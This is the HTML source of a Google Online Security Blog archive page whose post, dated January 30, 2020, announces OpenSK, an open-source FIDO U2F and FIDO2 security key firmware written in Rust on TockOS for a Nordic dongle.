CINXE.COM

<!DOCTYPE html> <html class='v2 list-page' dir='ltr' itemscope='' itemtype='http://schema.org/Blog' lang='en' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'> <head> <link href='https://www.blogger.com/static/v1/widgets/3566091532-css_bundle_v2.css' rel='stylesheet' type='text/css'/> <title> Google Online Security Blog: January 2020 </title> <meta content='JPvErrROkJmNEh4Lr_QT6CD77GdfQr6cLFw6gIXg6kc' name='google-site-verification'/> <meta content='width=device-width, height=device-height, minimum-scale=1.0, initial-scale=1.0, user-scalable=0' name='viewport'/> <meta content='IE=Edge' http-equiv='X-UA-Compatible'/> <meta content='Google Online Security Blog' property='og:title'/> <meta content='en_US' property='og:locale'/> <meta content='https://security.googleblog.com/2020/01/' property='og:url'/> <meta content='Google Online Security Blog' property='og:site_name'/>  <meta content='Google Online Security Blog' property='og:title'/> <meta content='summary' name='twitter:card'/> <meta content='@google' name='twitter:creator'/> <link href='https://fonts.googleapis.com/css?family=Roboto:400italic,400,500,500italic,700,700italic' rel='stylesheet' type='text/css'/> <link href='https://fonts.googleapis.com/icon?family=Material+Icons' rel='stylesheet'/> <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js' type='text/javascript'></script>  <style id='page-skin-1' type='text/css'></style> <style id='template-skin-1' type='text/css'></style>  <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/> <meta content='blogger' name='generator'/> <link href='https://security.googleblog.com/favicon.ico' rel='icon' type='image/x-icon'/> <link href='https://security.googleblog.com/2020/01/' rel='canonical'/> <link rel="alternate" type="application/atom+xml" title="Google Online Security Blog - Atom" href="https://security.googleblog.com/feeds/posts/default" /> <link rel="alternate" type="application/rss+xml" title="Google Online Security Blog - RSS" href="https://security.googleblog.com/feeds/posts/default?alt=rss" /> <link rel="service.post" type="application/atom+xml" title="Google Online Security Blog - Atom" href="https://www.blogger.com/feeds/1176949257541686127/posts/default" />  <meta content='https://security.googleblog.com/2020/01/' property='og:url'/> <meta content='Google Online Security Blog' property='og:title'/> <meta content='The latest news and insights from Google on security and safety on the Internet' property='og:description'/>  <base target='_self'/> <style> html { font-family: Roboto, sans-serif; -moz-osx-font-smoothing: grayscale; -webkit-font-smoothing: antialiased; } body { padding: 0; /* This ensures that the scroll bar is always present, which is needed */ /* because content render happens after page load; otherwise the header */ /* would "bounce" in-between states. */ min-height: 150%; } h2 { font-size: 16px; } h1, h2, h3, h4, h5 { line-height: 2em; } html, h4, h5, h6 { font-size: 14px; } a, a:visited { color: #4184F3; text-decoration: none; } a:focus, a:hover, a:active { text-decoration: none; } .Header { margin-top: 15px; } .Header h1 { font-size: 32px; font-weight: 300; line-height: 32px; height: 42px; } .header-inner .Header .titlewrapper { padding: 0; margin-top: 30px; } .header-inner .Header .descriptionwrapper { padding: 0; margin: 0; } .cols-wrapper { margin-top: 56px; } .header-outer, .cols-wrapper, .footer-outer, .google-footer-outer { padding: 0 60px; } .header-inner { height: 256px; position: relative; } html, .header-inner a { color: #212121; color: rgba(0,0,0,.87); } .header-inner .google-logo { display: inline-block; background-size: contain; z-index: 1; height: 46px; overflow: hidden; margin-top: 4px; margin-right: 8px; } .header-left { position: absolute; top: 50%; -webkit-transform: translateY(-50%); transform: translateY(-50%); margin-top: 12px; width: 100%; } .google-logo { margin-left: -4px; } #google-footer { position: relative; font-size: 13px; list-style: none; text-align: right; } #google-footer a { color: #444; } #google-footer ul { margin: 0; padding: 0; height: 144px; line-height: 144px; } #google-footer ul li { display: inline; } #google-footer ul li:before { color: #999; content: "\00b7"; font-weight: bold; margin: 5px; } #google-footer ul li:first-child:before { content: ''; } #google-footer .google-logo-dark { left: 0; margin-top: -16px; position: absolute; top: 50%; } /** Sitemap links. **/ .footer-inner-2 { font-size: 14px; padding-top: 42px; padding-bottom: 74px; } .footer-inner-2 .HTML h2 { color: #212121; color: rgba(0,0,0,.87); font-size: 14px; font-weight: 500; padding-left: 0; margin: 10px 0; } .footer-inner-2 .HTML ul { font-weight: normal; list-style: none; padding-left: 0; } .footer-inner-2 .HTML li { line-height: 24px; padding: 0; } .footer-inner-2 li a { color: rgba(65,132,243,.87); } /** Archive widget. **/ .BlogArchive { font-size: 13px; font-weight: normal; } .BlogArchive .widget-content { display: none; } .BlogArchive h2, .Label h2 { color: #4184F3; text-decoration: none; } .BlogArchive .hierarchy li { display: inline-block; } /* Specificity needed here to override widget CSS defaults. */ .BlogArchive #ArchiveList ul li, .BlogArchive #ArchiveList ul ul li { margin: 0; padding-left: 0; text-indent: 0; } .BlogArchive .intervalToggle { cursor: pointer; } .BlogArchive .expanded .intervalToggle .new-toggle { -ms-transform: rotate(180deg); transform: rotate(180deg); } .BlogArchive .new-toggle { float: right; padding-top: 3px; opacity: 0.87; } #ArchiveList { text-transform: uppercase; } #ArchiveList .expanded > ul:last-child { margin-bottom: 16px; } #ArchiveList .archivedate { width: 100%; } /* Months */ .BlogArchive .items { max-width: 150px; margin-left: -4px; } .BlogArchive .expanded .items { margin-bottom: 10px; overflow: hidden; } .BlogArchive .items > ul { float: left; height: 32px; } .BlogArchive .items a { padding: 0 4px; } .Label { font-size: 13px; font-weight: normal; } .sidebar-icon { display: inline-block; width: 24px; height: 24px; vertical-align: middle; margin-right: 12px; margin-top: -1px } .Label a { margin-right: 4px; } .Label .widget-content { display: none; } .FollowByEmail { font-size: 13px; font-weight: normal; } .FollowByEmail h2 { background: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAALCAYAAACZIGYHAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAUBJREFUeNrMkSGLAlEUhb+ZB4JFi8mx2cz+ApvhRUGTcUCrNqNJDYIi+DO0GUwmQXDK2DSIoGgZcSaIjDrzwrK4ssvChj1w0733O+fdp+m6PozH4yQSCfb7Pa7r8pOi0SjJZBLP8zgej4gAIMvlMuPxmADIYrHger1+C6lUKmo+NJ/NZojb7SZDWiwWo1qtks1msW2bw+HwZdkwDHq9HvV6nel0SqvVYrvdIh6Ph3Qch+VyqRYLhQJSSjRNw7IsfN9XgGKxSLfbJZfL0e/3aTabrFYr7vc7IujLcOh8PqunrNdr0uk0pVKJVCpFJBJRgEajweVyod1uMxgM2O12BAGUgRbU8DV2JpOhVquRz+cRQii3+XxOp9NRN3jVR5LPOp1OjEYjlSL8hclkgmmabDabt4d+m+S30vkD/R/IU4ABAPTZgnZdmG/PAAAAAElFTkSuQmCC"); background-repeat: no-repeat; background-position: 0 50%; text-indent: 30px; } .FollowByEmail .widget-content { display: none; } .searchBox input { border: 1px solid #eee; color: #212121; color: rgba(0,0,0,.87); font-size: 14px; padding: 8px 8px 8px 40px; width: 164px; font-family: Roboto, sans-serif; background: url("https://www.gstatic.com/images/icons/material/system/1x/search_grey600_24dp.png") 8px center no-repeat; } .searchBox ::-webkit-input-placeholder { /* WebKit, Blink, Edge */ color: rgba(0,0,0,.54); } .searchBox :-moz-placeholder { /* Mozilla Firefox 4 to 18 */ color: #000; opacity: 0.54; } .searchBox ::-moz-placeholder { /* Mozilla Firefox 19+ */ color: #000; opacity: 0.54; } .searchBox :-ms-input-placeholder { /* Internet Explorer 10-11 */ color: #757575; } .widget-item-control { margin-top: 0px; } .section { margin: 0; padding: 0; } #sidebar-top { border: 1px solid #eee; } #sidebar-top > div { margin: 16px 0; } .widget ul { line-height: 1.6; } /*main post*/ .post { margin-bottom:30px; } #main .post .title { margin: 0; } #main .post .title a { color: #212121; color: rgba(0,0,0,.87); font-weight: normal; font-size: 24px; } #main .post .title a:hover { text-decoration:none; color:#4184F3; } .message, #main .post .post-header { margin: 0; padding: 0; } #main .post .post-header .caption, #main .post .post-header .labels-caption, #main .post .post-footer .caption, #main .post .post-footer .labels-caption { color: #444; font-weight: 500; } #main .tr-caption-container td { text-align: left; } #main .post .tr-caption { color: #757575; color: rgba(0,0,0,.54); display: block; max-width: 560px; padding-bottom: 20px; } #main .post .tr-caption-container { line-height: 24px; margin: -1px 0 0 0 !important; padding: 4px 0; text-align: left; } #main .post .post-header .published{ font-size:11px; font-weight:bold; } .post-header .publishdate { font-size: 17px; font-weight:normal; color: #757575; color: rgba(0,0,0,.54); } #main .post .post-footer{ font-size:12px; padding-bottom: 21px; } .label-footer { margin-bottom: 12px; margin-top: 12px; } .comment-img { margin-right: 16px; opacity: 0.54; vertical-align: middle; } #main .post .post-header .published { margin-bottom: 40px; margin-top: -2px; } .post .post-content { color: #212121; color: rgba(0,0,0,.87); font-size: 17px; margin: 25px 0 36px 0; line-height: 32px; } .post-body .post-content ul, .post-body .post-content ol { margin: 16px 0; padding: 0 48px; } .post-summary { display: none; } /* Another old-style caption. */ .post-content div i, .post-content div + i { font-size: 14px; font-style: normal; color: #757575; color: rgba(0,0,0,.54); display: block; line-height: 24px; margin-bottom: 16px; text-align: left; } /* Another old-style caption (with link) */ .post-content a > i { color: #4184F3 !important; } /* Old-style captions for images. */ .post-content .separator + div:not(.separator) { margin-top: -16px; } /* Capture section headers. */ .post-content br + br + b, .post-content .space + .space + b, .post-content .separator + b { display: inline-block; margin-bottom: 8px; margin-top: 24px; } .post-content li { line-height: 32px; } /* Override all post images/videos to left align. */ .post-content .separator > a, .post-content .separator > span { margin-left: 0 !important; } .post-content img { max-width: 100%; height: auto; width: auto; } .post-content .tr-caption-container img { margin-bottom: 12px; } .post-content iframe, .post-content embed { max-width: 100%; } .post-content .carousel-container { margin-bottom: 48px; } #main .post-content b { font-weight: 500; } /* These are the main paragraph spacing tweaks. */ #main .post-content br { content: ' '; display: block; padding: 4px; } .post-content .space { display: block; height: 8px; } .post-content iframe + .space, .post-content iframe + br { padding: 0 !important; } #main .post .jump-link { margin-bottom:10px; } .post-content img, .post-content iframe { margin: 30px 0 20px 0; } .post-content > img:first-child, .post-content > iframe:first-child { margin-top: 0; } .col-right .section { padding: 0 16px; } #aside { background:#fff; border:1px solid #eee; border-top: 0; } #aside .widget { margin:0; } #aside .widget h2, #ArchiveList .toggle + a.post-count-link { color: #212121; color: rgba(0,0,0,.87); font-weight: 400 !important; margin: 0; } #ArchiveList .toggle { float: right; } #ArchiveList .toggle .material-icons { padding-top: 4px; } #sidebar .tab { cursor: pointer; } #sidebar .tab .arrow { display: inline-block; float: right; } #sidebar .tab .icon { display: inline-block; vertical-align: top; height: 24px; width: 24px; margin-right: 13px; margin-left: -1px; margin-top: 1px; color: #757575; color: rgba(0,0,0,.54); } #sidebar .widget-content > :first-child { padding-top: 8px; } #sidebar .active .tab .arrow { -ms-transform: rotate(180deg); transform: rotate(180deg); } #sidebar .arrow { color: #757575; color: rgba(0,0,0,.54); } #sidebar .widget h2 { font-size: 14px; line-height: 24px; display: inline-block; } #sidebar .widget .BlogArchive { padding-bottom: 8px; } #sidebar .widget { border-bottom: 1px solid #eee; box-shadow: 0px 1px 0 white; margin-bottom: 0; padding: 14px 0; min-height: 20px; } #sidebar .widget:last-child { border-bottom: none; box-shadow: none; margin-bottom: 0; } #sidebar ul { margin: 0; padding: 0; } #sidebar ul li { list-style:none; padding:0; } #sidebar ul li a { line-height: 32px; } #sidebar .archive { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAYCAYAAADzoH0MAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAE1JREFUeNpiNDY23s9AAWBioBCwYBM8c+YMVsUmJibEGYBNMS5DaeMFfDYSZQA2v9I3FrB5AZeriI4FmnrBccCT8mhmGs1MwyAzAQQYAKEWG9zm9QFEAAAAAElFTkSuQmCC"); height: 24px; line-height: 24px; padding-left: 30px; } #sidebar .labels { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAARCAYAAAA7bUf6AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAUxJREFUeNpiNDY23s9AAMycOfM7UF05kHkZmzwTMkdSUhKrIcXFxZy3bt3qBjIN8RrS09PDsHnzZjCNDr58+cKQlpbGDjSoHcg1w2oIyAUODg5gARCNzUVIBrUCuVYYhjx//pzhwIEDYAEQDeJjA1CDWIAGNQK59jBxRuSABbkAlwHIgIeHh2HWrFn/1NTU2oDcvSgBS4wBSC5iArqoCsj1YGIgEyAZVMoEchqlBjEB/cZAiUHg2AEGznpKDAImxOeM////B4VLKtBvEUCngZ1ILKivr3/u6+ubBzJAGZQ9gC5aQoqLgAY8BhkAZL4BuQQkxgXE34A4BuiiZEIuAhrwEGhAEZD5DpzYoIaA2UAM4kQADUrHZRDUgAIg8wO2XAwzbQXQa5OweQ1owB10AyA6gS7BgX1u3ry5397eHow3bdo0EyjGi00tQIABANPgyAH1q1eaAAAAAElFTkSuQmCC"); height: 20px; line-height: 20px; padding-left: 30px; } #sidebar .rss a { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABIAAAASCAYAAABWzo5XAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAX5JREFUeNqsVDGSgkAQHL2rIiIikohIc/EBRkbwAIwuwgfwAXiAD9AHSI7kEkECRCb6AIyINDLx7K0aa6kT7uq0q7YYtnZ7umdnt7darXbr9Zpegeu61DNNc0dvwCcH4/GYJpMJnc9nOhwOVJbl/4hAAokMECZJQtvt9k+kH7qufyEYDAakqqqYxFdRFBqNRmTbNg2HQ0rTlK7XayvR0xqBdDqdkuM4dE/0ULhYLOh4PHYrknG5XGi/31MYhuL/nkwonM1mlGUZ1XXdrsiyLGEDhY7juJEZ1u5tIixDGdYhmYw+B7CAzPP5nDabjdgIAgCksMX1832/3drtdqPT6SQWapomiGEFNkDEdpDMMAzK81ys/7XYy+XyoQgq2WoURSIJ2iIIgp/WZCCTvFm2wgeAU31aI3Q2GhIDMeB53qPYPIcm5VrxXIOIOxsDMStjVawAc1VViRgN22lNBiuQN3GR+SY07hpOoStmFQAKXRRFY93bnpG+fONfedi+BRgAbkS8Fxp7QQIAAAAASUVORK5CYII="); } #sidebar .subscription a { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAALCAYAAACZIGYHAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAUBJREFUeNrMkSGLAlEUhb+ZB4JFi8mx2cz+ApvhRUGTcUCrNqNJDYIi+DO0GUwmQXDK2DSIoGgZcSaIjDrzwrK4ssvChj1w0733O+fdp+m6PozH4yQSCfb7Pa7r8pOi0SjJZBLP8zgej4gAIMvlMuPxmADIYrHger1+C6lUKmo+NJ/NZojb7SZDWiwWo1qtks1msW2bw+HwZdkwDHq9HvV6nel0SqvVYrvdIh6Ph3Qch+VyqRYLhQJSSjRNw7IsfN9XgGKxSLfbJZfL0e/3aTabrFYr7vc7IujLcOh8PqunrNdr0uk0pVKJVCpFJBJRgEajweVyod1uMxgM2O12BAGUgRbU8DV2JpOhVquRz+cRQii3+XxOp9NRN3jVR5LPOp1OjEYjlSL8hclkgmmabDabt4d+m+S30vkD/R/IU4ABAPTZgnZdmG/PAAAAAElFTkSuQmCC"); } #sidebar-bottom { background: #f5f5f5; border-top:1px solid #eee; } #sidebar-bottom .widget { border-bottom: 1px solid #e0e0e0; padding: 15px 0; text-align: center; } #sidebar-bottom > div:last-child { border-bottom: 0; } #sidebar-bottom .text { line-height: 20px; } /* Home, forward, and backward pagination. */ .blog-pager { border-top : 1px #e0e0e0 solid; padding-top: 10px; margin-top: 15px; text-align: right !important; } #blog-pager { margin-botom: 0; margin-top: -14px; padding: 16px 0 0 0; } #blog-pager a { display: inline-block; } .blog-pager i.disabled { opacity: 0.2 !important; } .blog-pager i { color: black; margin-left: 16px; opacity: 0.54; } .blog-pager i:hover, .blog-pager i:active { opacity: 0.87; } #blog-pager-older-link, #blog-pager-newer-link { float: none; } .gplus-profile { background-color: #fafafa; border: 1px solid #eee; overflow: hidden; width: 212px; } .gplus-profile-inner { margin-left: -1px; margin-top: -1px; } /* Sidebar follow buttons. */ .followgooglewrapper { padding: 12px 0 0 0; } .loading { visibility: hidden; } .detail-page .post-footer .cmt_iframe_holder { padding-top: 40px !important; } /** Desktop **/ @media (max-width: 900px) { .col-right { display: none; } .col-main { margin-right: 0; min-width: initial; } .footer-outer { display: none; } .cols-wrapper { min-width: initial; } .google-footer-outer { background-color: #f5f5f5; } } /** Tablet **/ @media (max-width: 712px) { .header-outer, .cols-wrapper, .footer-outer, .google-footer-outer { padding: 0 40px; } } /* An extra breakpoint accommodating for long blog titles. */ @media (max-width: 600px) { .header-left { height: 100%; top: inherit; margin-top: 0; -webkit-transform: initial; transform: initial; } .header-title { margin-top: 18px; } .header-inner .google-logo { height: 40px; margin-top: 3px; } .header-inner .google-logo img { height: 42px; } .header-title h2 { font-size: 32px; line-height: 40px; } .header-desc { bottom: 24px; position: absolute; } } /** Mobile/small desktop window; also landscape. **/ @media (max-width: 480px), (max-height: 480px) { .header-outer, .cols-wrapper, .footer-outer, .google-footer-outer { padding: 0 16px; } .cols-wrapper { margin-top: 0; } .post-header .publishdate, .post .post-content { font-size: 16px; } .post .post-content { line-height: 28px; margin-bottom: 30px; } .post { margin-top: 30px; } .byline-author { display: block; font-size: 12px; line-height: 24px; margin-top: 6px; } #main .post .title a { font-weight: 500; color: #4c4c4c; color: rgba(0,0,0,.70); } #main .post .post-header { padding-bottom: 12px; } #main .post .post-header .published { margin-bottom: -8px; margin-top: 3px; } .post .read-more { display: block; margin-top: 14px; } .post .tr-caption { font-size: 12px; } #main .post .title a { font-size: 20px; line-height: 30px; } .post-content iframe { /* iframe won't keep aspect ratio when scaled down. */ max-height: 240px; } .post-content .separator img, .post-content .tr-caption-container img, .post-content iframe { margin-left: -16px; max-width: inherit; width: calc(100% + 32px); } .post-content table, .post-content td { width: 100%; } #blog-pager { margin: 0; padding: 16px 0; } /** List page tweaks. **/ .list-page .post-original { display: none; } .list-page .post-summary { display: block; } .list-page .comment-container { display: none; } .list-page #blog-pager { padding-top: 0; border: 0; margin-top: -8px; } .list-page .label-footer { display: none; } .list-page #main .post .post-footer { border-bottom: 1px solid #eee; margin: -16px 0 0 0; padding: 0 0 20px 0; } .list-page .post .share { display: none; } /** Detail page tweaks. **/ .detail-page .post-footer .cmt_iframe_holder { padding-top: 32px !important; } .detail-page .label-footer { margin-bottom: 0; } .detail-page #main .post .post-footer { padding-bottom: 0; } .detail-page #comments { display: none; } } [data-about-pullquote], [data-is-preview], [data-about-syndication] { display: none; } </style> <noscript> <style> .loading { visibility: visible }</style> </noscript>  <script async='true' src='https://www.googletagmanager.com/gtag/js?id=G-K46T604G22'></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-K46T604G22'); </script> <link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1176949257541686127&zx=82a7f4cd-b217-4761-bf81-053c33f91622' media='none' onload='if(media!='all')media='all'' rel='stylesheet'/><noscript><link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1176949257541686127&zx=82a7f4cd-b217-4761-bf81-053c33f91622' rel='stylesheet'/></noscript> <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/> <meta name='google-adsense-platform-domain' content='blogspot.com'/> </head> <body> <script type='text/javascript'> //<![CDATA[ var axel = Math.random() + ""; var a = axel * 10000000000000; document.write('<iframe src="https://2542116.fls.doubleclick.net/activityi;src=2542116;type=gblog;cat=googl0;ord=ord=' + a + '?" width="1" height="1" frameborder="0" style="display:none"></iframe>'); //]]> </script> <noscript> <img alt='' height='1' src='https://ad.doubleclick.net/ddm/activity/src=2542116;type=gblog;cat=googl0;ord=1?' width='1'/> </noscript>  <div class='header-outer'> <div class='header-inner'> <div class='section' id='header'><div class='widget Header' data-version='1' id='Header1'> <div class='header-left'> <div class='header-title'> <a class='google-logo' href='https://security.googleblog.com/'> <img height='50' src='https://www.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png'/> </a> <a href='/.'> <h2> Security Blog </h2> </a> </div> <div class='header-desc'> The latest news and insights from Google on security and safety on the Internet </div> </div> </div></div> </div> </div>  <div class='cols-wrapper loading'> <div class='col-main-wrapper'> <div class='col-main'> <div class='section' id='main'><div class='widget Blog' data-version='1' id='Blog1'> <div class='post' data-id='991058832846546625' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html' itemprop='url' title='Say hello to OpenSK: a fully open-source security key implementation'> Say hello to OpenSK: a fully open-source security key implementation </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' itemprop='datePublished'> January 30, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Elie Bursztein, Security & Anti-abuse Research Lead, and Jean-Michel Picod, Software Engineer, Google </span><br /> <span class="byline-author"><br /></span> <div class="separator" style="clear: both; text-align: center;"> </div> <br /> Today, <a href="https://fidoalliance.org/how-fido-works/">FIDO</a> security keys are reshaping the way online accounts are protected by providing an easy, phishing-resistant form of two-factor authentication (2FA) that is trusted by a growing number of websites, including Google, social networks, cloud providers, and many others. To help advance and improve access to FIDO authenticator implementations, we are excited, following other open-source projects like Solo and Somu, to announce the release of <a href="https://github.com/google/OpenSK">OpenSK</a>, an open-source implementation for security keys written in <a href="https://www.rust-lang.org/">Rust</a> that supports both FIDO U2F and FIDO2 standards. <br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-jQvZmprkkOU/XjL4iBkvbgI/AAAAAAAABgo/khrdiLFzrCw7hCv23OcIuxHxD6RQZZwDwCNcBGAsYHQ/s1600/unnamed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="512" height="225" src="https://1.bp.blogspot.com/-jQvZmprkkOU/XjL4iBkvbgI/AAAAAAAABgo/khrdiLFzrCw7hCv23OcIuxHxD6RQZZwDwCNcBGAsYHQ/s400/unnamed.jpg" width="400" /></a></div> <div style="text-align: center;"> <b>Photo of OpenSK developer edition: a Nordic Dongle running the OpenSK firmware on DIY case</b></div> <div style="text-align: left;"> <br /></div> By opening up OpenSK as a research platform, our hope is that it will be used by researchers, security key manufacturers, and enthusiasts to help develop innovative features and accelerate security key adoption.<br /> <br /> With this early release of OpenSK, you can make your own developer key by flashing the OpenSK firmware on a <a href="https://www.nordicsemi.com/About-us/BuyOnline?search_token=nRF52840%20Dongle&series_token=nRF52840">Nordic chip dongle</a>. In addition to being affordable, we chose Nordic as initial reference hardware because it supports all major transport protocols mentioned by <a href="https://fidoalliance.org/specs/fido-v2.0-ps-20190130/fido-client-to-authenticator-protocol-v2.0-ps-20190130.html#transport-specific-bindings">FIDO2</a>: NFC, Bluetooth Low Energy, USB, and a dedicated hardware crypto core. To protect and carry your key, we are also providing a <a href="https://www.thingiverse.com/thing:4132768">custom, 3D-printable case</a> that works on a variety of printers.<br /> <br /> “We’re excited to collaborate with Google and the open source community on the new OpenSK research platform,” said Kjetil Holstad, Director of Product Management at Nordic Semiconductor. “We hope that our industry leading nRF52840’s native support for secure cryptographic acceleration combined with new features and testing in OpenSK will help the industry gain mainstream adoption of security keys.” <br /> <div> <br /> <div class="separator" style="clear: both; text-align: center;"> <iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/klEozvpw0xg/0.jpg" src="https://www.youtube.com/embed/klEozvpw0xg?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div> While you can make your own fully functional FIDO authenticator today, as showcased in the video above, this release should be considered as an experimental research project to be used for testing and research purposes.</div> <br /> <br /> Under the hood, OpenSK is written in <a href="https://www.rust-lang.org/">Rust</a> and runs on <a href="https://www.tockos.org/">TockOS</a> to provide better isolation and cleaner OS abstractions in support of security. Rust’s strong memory safety and zero-cost abstractions makes the code less vulnerable to logical attacks. <a href="https://www.tockos.org/documentation/design">TockOS, with its sandboxed architecture</a>, offers the isolation between the security key applet, the drivers, and kernel that is needed to build defense-in-depth. Our TockOS contributions, including our <a href="https://github.com/tock/tock/pull/1467">flash-friendly storage system</a> and <a href="https://github.com/tock/tock/pulls?q=is%3Apr+author%3Agendx">patches</a>, have all been upstreamed to the TockOS repository. We’ve done this to encourage everyone to build upon the work.<br /> <div> <br /></div> <div> <br /> <b>How to get involved and contribute to OpenSK </b><br /> <div> <br /></div> <div> To learn more about OpenSK and how to experiment with making your own security key, you can check out our <a href="https://github.com/google/OpenSK">GitHub repository</a> today. With the help of the research and developer communities, we hope OpenSK over time will bring innovative features, stronger embedded crypto, and encourage widespread adoption of trusted phishing-resistant tokens and a passwordless web.<br /> <b><br /></b> <b>Acknowledgements</b><br /> <br /> We also want to thank our OpenSK collaborators: Adam Langley, Alexei Czeskis, Arnar Birgisson, Borbala Benko, Christiaan Brand, Dirk Balfanz, Dominic Rizzo, Fabian Kaczmarczyck, Guillaume Endignoux, Jeff Hodges, Julien Cretin, Mark Risher, Oxana Comanescu, Tadek Pietraszek</div> </div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Elie Bursztein, Security & Anti-abuse Research Lead, and Jean-Michel Picod, Software Engineer, Google </span><br /> <span class="byline-author"><br /></span> <div class="separator" style="clear: both; text-align: center;"> </div> <br /> Today, <a href="https://fidoalliance.org/how-fido-works/">FIDO</a> security keys are reshaping the way online accounts are protected by providing an easy, phishing-resistant form of two-factor authentication (2FA) that is trusted by a growing number of websites, including Google, social networks, cloud providers, and many others. To help advance and improve access to FIDO authenticator implementations, we are excited, following other open-source projects like Solo and Somu, to announce the release of <a href="https://github.com/google/OpenSK">OpenSK</a>, an open-source implementation for security keys written in <a href="https://www.rust-lang.org/">Rust</a> that supports both FIDO U2F and FIDO2 standards. <br /> <div> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-jQvZmprkkOU/XjL4iBkvbgI/AAAAAAAABgo/khrdiLFzrCw7hCv23OcIuxHxD6RQZZwDwCNcBGAsYHQ/s1600/unnamed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="512" height="225" src="https://1.bp.blogspot.com/-jQvZmprkkOU/XjL4iBkvbgI/AAAAAAAABgo/khrdiLFzrCw7hCv23OcIuxHxD6RQZZwDwCNcBGAsYHQ/s400/unnamed.jpg" width="400" /></a></div> <div style="text-align: center;"> <b>Photo of OpenSK developer edition: a Nordic Dongle running the OpenSK firmware on DIY case</b></div> <div style="text-align: left;"> <br /></div> By opening up OpenSK as a research platform, our hope is that it will be used by researchers, security key manufacturers, and enthusiasts to help develop innovative features and accelerate security key adoption.<br /> <br /> With this early release of OpenSK, you can make your own developer key by flashing the OpenSK firmware on a <a href="https://www.nordicsemi.com/About-us/BuyOnline?search_token=nRF52840%20Dongle&series_token=nRF52840">Nordic chip dongle</a>. In addition to being affordable, we chose Nordic as initial reference hardware because it supports all major transport protocols mentioned by <a href="https://fidoalliance.org/specs/fido-v2.0-ps-20190130/fido-client-to-authenticator-protocol-v2.0-ps-20190130.html#transport-specific-bindings">FIDO2</a>: NFC, Bluetooth Low Energy, USB, and a dedicated hardware crypto core. To protect and carry your key, we are also providing a <a href="https://www.thingiverse.com/thing:4132768">custom, 3D-printable case</a> that works on a variety of printers.<br /> <br /> “We’re excited to collaborate with Google and the open source community on the new OpenSK research platform,” said Kjetil Holstad, Director of Product Management at Nordic Semiconductor. “We hope that our industry leading nRF52840’s native support for secure cryptographic acceleration combined with new features and testing in OpenSK will help the industry gain mainstream adoption of security keys.” <br /> <div> <br /> <div class="separator" style="clear: both; text-align: center;"> <iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/klEozvpw0xg/0.jpg" src="https://www.youtube.com/embed/klEozvpw0xg?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div> While you can make your own fully functional FIDO authenticator today, as showcased in the video above, this release should be considered as an experimental research project to be used for testing and research purposes.</div> <br /> <br /> Under the hood, OpenSK is written in <a href="https://www.rust-lang.org/">Rust</a> and runs on <a href="https://www.tockos.org/">TockOS</a> to provide better isolation and cleaner OS abstractions in support of security. Rust’s strong memory safety and zero-cost abstractions makes the code less vulnerable to logical attacks. <a href="https://www.tockos.org/documentation/design">TockOS, with its sandboxed architecture</a>, offers the isolation between the security key applet, the drivers, and kernel that is needed to build defense-in-depth. Our TockOS contributions, including our <a href="https://github.com/tock/tock/pull/1467">flash-friendly storage system</a> and <a href="https://github.com/tock/tock/pulls?q=is%3Apr+author%3Agendx">patches</a>, have all been upstreamed to the TockOS repository. We’ve done this to encourage everyone to build upon the work.<br /> <div> <br /></div> <div> <br /> <b>How to get involved and contribute to OpenSK </b><br /> <div> <br /></div> <div> To learn more about OpenSK and how to experiment with making your own security key, you can check out our <a href="https://github.com/google/OpenSK">GitHub repository</a> today. With the help of the research and developer communities, we hope OpenSK over time will bring innovative features, stronger embedded crypto, and encourage widespread adoption of trusted phishing-resistant tokens and a passwordless web.<br /> <b><br /></b> <b>Acknowledgements</b><br /> <br /> We also want to thank our OpenSK collaborators: Adam Langley, Alexei Czeskis, Arnar Birgisson, Borbala Benko, Christiaan Brand, Dirk Balfanz, Dominic Rizzo, Fabian Kaczmarczyck, Guillaume Endignoux, Jeff Hodges, Julien Cretin, Mark Risher, Oxana Comanescu, Tadek 